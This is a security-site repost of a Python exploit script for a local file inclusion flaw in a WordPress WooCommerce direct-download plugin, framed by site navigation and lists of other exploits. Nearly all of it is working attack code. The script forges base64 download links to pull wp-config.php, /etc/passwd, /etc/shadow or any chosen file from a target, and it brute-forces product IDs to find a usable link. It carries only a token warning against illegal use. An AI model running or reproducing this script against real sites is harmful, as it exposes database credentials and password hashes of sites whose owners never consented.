首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WordPress WooCommerce Direct Download Local File Inclusion
来源:http://www.diegoceldran.es/ 作者:Morell 发布时间:2017-01-18  
#lfi_attack_for_direct_download_woocommerce.py

#
# Author: Diego Celdran Morell
# Web: http://www.diegoceldran.es/
# Fecha Ultima actualizacion: 15/01/2017
# Version: V1.0
# No me hago responsable del mal uso que se le pueda dar a esta herramienta
#

import os;


try:
	#pip install urlopen
	import requests;

except (Exception):
	#ejecutar pip install urlopen
	print(" Installing required modules...");
	os.system("pip install requests");
	from urllib2 import urlopen


try:
	#pip install urlopen
	import base64;

except (Exception):
	#ejecutar pip install urlopen
	print(" Installing required modules...");
	os.system("pip install base64");
	import base64


def make_exploit(download_link):
	lnk_download = download_link;

	parts     =  lnk_download.split("/direct-download/");
	toDecode  =  parts[1];
	domain    =  parts[0];

	if (toDecode[:-1] == "/"):
		toDecode = toDecode[:count(toDecode)-1];

	else:
		toDecode = toDecode;

	decoded = str(base64.b64decode(toDecode.encode('ascii')).decode('utf-8'));

	productID = decoded.split("|")[0];

	print(" ");
	print(" ProductID: " + productID);
	print(" ");
	eject_exploit(productID, domain);


def eject_exploit(productID, domain):
	print(" Select a file to download");
	print(" [0] wp-config.php");
	print(" [1] /etc/passwd");
	print(" [2] /etc/shadow");
	print(" or select another path to file to download");
	print(" ");
	optDownload = input(" >>> ");
	print(" ");


	if (domain[:7] == "http://"):
		domain = domain;

	elif (domain[:8] == "https://"):
		domain = domain;

	else:
		domain = "http://" + domain;


	if (optDownload == "0"):
		fileToDownload = "wp-config.php";

	elif (optDownload == "1"):
		fileToDownload = "/etc/passwd";

	elif (optDownload == "2"):
		fileToDownload = "/etc/shadow"

	else:
		fileToDownload = optDownload;

	url = domain + "/direct-download/" + base64.b64encode((str(productID) + "|" + fileToDownload).encode('ascii')).decode('utf-8');

	print(" Downloading " + fileToDownload + " file from " + domain);
	print(" Accesing to " + url);
	print(" ");

	req = requests.get(url);

	if (req.status_code == 200):
		print(" File downloaded correctly!");

		fileName = fileToDownload.replace("\\", "/");
		file = fileName.split("/");
		fileText = str(file[-1]);

		f = open(fileText, 'w');
		
		f.write(req.text);

		f.close();

		print(" Acces to this file in: " + str(os.path.dirname(os.path.abspath(__file__))) + " folder");
		print(" ");

	else:
		print(" [-] This domain is not vulnerable");

	eject_exploit(productID, domain);


def get_product_id(domain, minID, maxID):
	if(maxID == False):
		maxID = 999999999999999999;

	url = "";

	if (domain[:7] == "http://"):
		print(domain[:7]);
		url = domain;

	elif (domain[:8] == "https://"):
		prin(domain[:8]);
		url = domain;

	else:
		url = "http://" + domain;


	if (url[:-1] == "/"):
		url = url + "direct-download/";

	else:
		url = url + "/direct-download/";


	actuallyId = minID;
	idProduct = 0;
	
	while (idProduct == 0 and actuallyId <= maxID):
		encodedURL = base64.b64encode((str(actuallyId) + "|").encode('ascii'));
		urlToTest = url + str(encodedURL.decode("utf-8")) + "/"
		print(" Testing ID: " + str(actuallyId) + "; Getting URL: " + urlToTest);
		#print("");
		
		req = requests.get(urlToTest);
		
		if (req.status_code == 200):
			
			if("This product is not available for direct free download." in req.text):
				# testing text you recibe
				print(" [-] No product fount with ID: " + str(actuallyId));
				print(" ");

			else:
				print(" [+] A product ID was fount: " + str(actuallyId));
				print(" ");
				idProduct = actuallyId;

		else:
			print(" [-] This domain is not vulnerable");
		
		actuallyId = actuallyId+1;

	if (idProduct != 0):
		eject_exploit(idProduct, domain);
		

def testin_get_a_download_link(domain):
	print(" Do you want try to find a valid URL for the website?");
	print(" [0] no, exit");
	print(" [1] yes, it may have a long time");
	print(" ");
	test_find = input(" >>> ");
	print(" ");

	if (test_find == "1"):
		# Proseguir
		print(" Please select the minimun id to find the product (0 to none; minimun id to start recomended: 400)");
		minID = input(" >>> ");
		print(" ");

		if (minID == "0"):
			minID = 1;

		else:
			minID = int(minID);

		print(" Please select the maximun id to find the product (0 to stop manually when you want)");
		maxID = input(" >>> ");
		print(" ");

		if (maxID == "0"):
			maxID = False;

		else:
			maxID = int(maxID);

		get_product_id(domain, minID, maxID);

	else:
		exit();


def get_download_link(domain):
	print(" Please");
	print(" Set a download link from the website: ");
	print(" [0] I don't have any download link");
	print(" ");
	download_link = input(" >>> ");
	print(" ");

	if (download_link == "0"):
		testin_get_a_download_link(domain);

	else:
		make_exploit(download_link);


def get_download_link_no_domain():
	print(" Please");
	print(" Set a download link from the website: ");
	print(" [0] I don't have any download link");
	print(" ");
	download_link = input(" >>> ");
	print(" ");

	if (download_link == "0"):
		print(" Please, select the domain to attack");
		domain = input(" >>> ");
		print("");
		testin_get_a_download_link(domain);

	else:
		make_exploit(download_link);


def check_vulnerable_domain(domain = "diegoceldran.es"):
	# Check if domain/direct-download/a/ return any thing
	if (domain[:7] == "http://"):
		url = domain;

	elif (domain[:8] == "https://"):
		url = domain;

	else:
		url = "http://" + domain;

	if (url[:-1] == "/"):
		url = url + "direct-download/a/";

	else:
		url = url + "/direct-download/a/";


	req = requests.get(url);
	if (req.status_code == 200):
		print(" The web site: " + url + " respond: ");
		print(" " + req.text);
		print(" [+] This domain is maybe vulnerable");
		print(" ");

		get_download_link(domain);

	else:
		print(" [-] This domain is not vulnerable");

print(" ");
print(" LFI Attack for Direct Download Woocommerce plugin is started!");
print(" ");
print(" If you're using this module out of BrutiFramework, please, visit");
print(" http://www.diegoceldran.es/brutiframework-alfa/ to Download ");
print(" BrutiFramework from the oficial site. Thanks!");
print(" ");
print(" IMPORTANT:\n NO USE THIS EXPLOIT FOR ILEGAL PURPOSES");
print(" ");
print(" Select the target: (ej: www.diegoceldran.es)");
print(" [0] Omit the checking progress");
print(" ");
domain = input(" >>> ");
if (domain != "0"):
	print(" ");
	print(" Checking " + domain + "...");
	print(" ");
	check_vulnerable_domain(domain);

else:
	print(" ");
	get_download_link_no_domain();

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Tenda ADSL2/2+ Modem D840R - U
·dirLIST 0.3.0 - Arbitrary File
·Pirelli DRG A115 ADSL Router -
·BoZoN 2.4 - Remote Code Execut
·iSelect v1.4 - Local Buffer Ov
·SentryHD 02.01.12e - Privilege
·WinaXe Plus 8.7 - Buffer Overf
·Tenda ADSL2/2+ Modem D820R - U
·PHP LibGD Heap Buffer Overflow
·Pirelli DRG A115 v3 ADSL Route
·Apple iTunes Notify Script Ins
·SunOS 5.11 Remote ICMP Weaknes
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved